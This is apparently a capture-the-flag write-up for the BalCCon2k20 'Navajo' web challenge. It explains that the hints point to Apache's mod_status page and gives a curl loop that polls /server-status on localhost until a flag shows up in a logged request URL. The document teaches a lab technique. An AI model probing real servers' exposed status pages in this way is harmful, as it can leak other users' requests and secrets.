Reasoning

Attentive player might notice that Navajo is an ethnic group closely related to Apache. Also, there is a "status" word in the challenge description. This points to widely-known mod_status feature of Apache web server. The default location for it is /server-status.

As an additional hint, we provided robots.txt file which also points to /server-status.

Actual solution

Small extra difficulty is that flag is not always present in the server-status output.

Hence, we request /server-status endpoint until we get the flag:

$ while true ; do curl -s http://localhost:8000/server-status | grep flag | grep -v flag\.txt ; done
</td><td>127.0.0.1</td><td>http/1.1</td><td nowrap>10.200.0.3:80</td><td nowrap>GET /flag%7Bsecret_url_that_no_one_can_guess%7D HTTP/1.1</td></tr>

Original writeup (https://github.com/oioki/balccon2k20-ctf/tree/master/web/navajo/solution).